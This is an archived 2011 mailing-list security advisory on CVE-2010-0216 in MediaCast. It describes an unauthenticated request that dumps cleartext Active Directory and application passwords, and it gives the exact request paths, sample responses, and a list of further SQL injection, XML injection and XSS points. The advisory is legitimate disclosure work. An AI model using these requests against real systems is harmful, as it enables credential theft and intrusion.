lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <EE85EEC3-63E9-4221-B438-BEF3F666D7FE@packetninjas.net>
Date: Mon, 25 Apr 2011 09:52:05 -0500
From: Daniel Clemens <daniel.clemens@...ketninjas.net>
To: full-disclosure@...ts.grok.org.uk
Subject: CVE-2010-0216 MediaCast Password Dump
	Vulnerability

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


                        Packetninjas L.L.C
                       www.packetninjas.net

                    -= Security  Advisory =-

 Advisory:      MediaCast Password Dump Vulnerability
	      
 Release Date:  04/25/2011

      Author:   Daniel Clemens [daniel.clemens[at]packetninjas.net]

 Application:   MediaCast <= 8 (By Inventive, Inc) - http://www.InventiveTec.com
 Description:

Vulnerabilities exist within the MediaCast application have been discovered that allow
an unauthenticated user  to force the application to return critical values (Username 
and Password Information) to the end user within verbose error messages. 

By sending a GET request to /authenticate_ad_setup_finished.cfm?UserID=<ID>&ClearSession=1 
( or /authenticate_ad_setup_finished.cfm?UserID=<ID> ) 
usernames and passwords of previously cached Active Directory
credentials would be displayed as well as specific application level user name and 
password information (which at times could differ from AD credentials if the 
credentials have been updated within Active Directory and the user hasn't logged into
the web application with new credentials). 

The impact of this vulnerability is that an attacker has the ability to enumerate sequential 
usernames as well as the clear text passwords associated with users within the application 
and Active Directory Domain. 

Further review of the root cause of this vulnerability was not performed during the analysis 
of this vulnerability since these issues were discovered during a remote penetration test
of a network in contrast to a dedicated application review.  

Besides obvious correlation between verbose error message output and 
incorrect or non-existant exception handlers, it appears that this vulnerability 
exists due because the following conditions met:
* Incorrect Session Handling and Implementation (on /authenticate_ad_setup_finished.cfm)
* Incorrect Logic implementation
* Clear Text Storage of password information
* Active ldap integration with existing Active Directory Domain
* Possibly a problem with the cold fusion dll that is aiding in the AD integration....


Risk:          Critical 
Vendor Status: Patch Available  

http://www.packetninjas.net/storage/advisories/MediaCast-PWDump-FINAL.txt

Misc Notes:

About MediaCast: 
"MediaCAST combines a Web-enabled learning management system with the tools to create,
manage, and deliver live and on-demand IP multimedia anytime, anywhere. It is feature-rich,
easy-to-use and efficient platform for creating and managing multimedia content and delivering
online learning programs"



Proof of Concept:

Sequential GET Request:
/authenticate_ad_setup_finished.cfm?UserID=<ID>&ClearSession=1
/authenticate_ad_setup_finished.cfm?UserID=<ID>

Request:
/authenticate_ad_setup_finished.cfm?UserID=<ID>&ClearSession=1

Response:
Programs,Courses,Sections,Resources
IP_Address x.x.x.x
IsAdmin 0
IsGeneric 0
IsInstructor 1
IsManager 0
IsTrainingManager 0
OrganizationID 20
Password mycrazycleartextpassword!
SetTopMode 0
SystemID 20
SystemType MediaCAST
UploadMethod 1 UserID 31337
Username craig.mckenna
VersionNumber 8
WebCT 0
cfid 490595
cftoken 4CA9DA0E-956B-4A61-A6F3DB4FFCC98BDA
email [null] emailAddress [null]
sessionid INVENTIVE_490595_4CA9DA0E-956B-4A61-A6F3DB4FFCC98BDA
urltoken CFID=490595&CFTOKEN=4CA9DA0E-956B-4A61-A6F3DB4FFCC98BD


Request:
GET /authenticate_ad_setup_finished.cfm?UserID=<ID>

Example Response:
<td class='cfdump_td_query'>1</td>
<td class='cfdump_td_value'>1069</td>
<td class='cfdump_td_value'>abc</td>
<td class='cfdump_td_value'>abcpass123</td>
<td class='cfdump_td_value'>2009-12-07 09:12:30.000</td>
<td class='cfdump_td_value'>[null]</td>
<td class='cfdump_td_value'>[null]</td>
<td class='cfdump_td_value'>1</td>
<td class='cfdump_td_value'>[null]</td>
<td class='cfdump_td_value'>[null]</td>
<td class='cfdump_td_value'>0</td>
<td class='cfdump_td_value'>company name</td>
<td class='cfdump_td_value'>[empty string]</td>



Disclosure Timeline:
 July 21, 2010   - Initial Contact with client using MediaCAST which enabled remote root of network
                    during remote penetration test.  
 August 11, 2010 - Email contact as well as phone calls placed to vendor 
 August x, 2010  - Multiple calls to developers, support etc. 
 August 24, 2010 - Vendor Response
                 "You are correct that the system was displaying verbose error messages that contained 
                 information that could be used in a nefarious way. 
                 I have turned off the display of this extended debugging information.  
                 I have also addressed the issue with the /authenticate_ad_setup_finished.cfm URL 
                 such that it traps the problematic condition and redirects the user to the login page."
				
Recommendation:
 - Patch to the most current version of MediaCast, or patch current MediaCast application. 



CVE Information: CVE-2010-0216 

Misc. Items that should be patched with patched deployed by MediaCast:
	1) Default Blue Dragon Administrative Interface exposed to the Internet in default installations.
	This should really be bound to localhost:10000
		- Misc xss vulns were present in this piece of software. 
	2) 	XML Injection - /inventivex/mangetraining/ CP_RIGHTSOURCE , bdclient_Inventive Cookie
	3)  SQL Injection through /authenticate_ad_setup_finished.cfm
	4)  SQL Injection MediaCast SQL Injection /inventivex/managetraining [ CP_ENLARGESTYLE cookie ] injection
	5)  Mediacast Application Information Leakage URI: /inventivex/isptools/release/metadata/globalIncludeFolders.txt
		-- snip --
		globalExcludeFolders.txt
		Public\inventivex\isptools\release\archive\*
		Public\inventivex\isptools\release\metadata\*
		Public\*.zip
		Public\Copy of*
		Public\Backup of*
		Public\rsync\rsync_log\*.txt
		Public\images.zip
		Public\mysql_odbc.msi
		-- snip -- 

| Daniel Uriah Clemens
| Packetninjas L.L.C | | http://www.packetninjas.net
| c. 205.567.6850      | | o. 866.267.8851 
"Moments of sorrow are moments of sobriety"
-----BEGIN PGP SIGNATURE-----

iD8DBQFNtE3blZy1vkUrR4MRAmTDAJ4gUgUpOen7gc50eQxl1/pG9QHi1QCdFixs
adarnuyShSYjBWVw2SlmbRE=
=Ip9H
-----END PGP SIGNATURE-----








_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ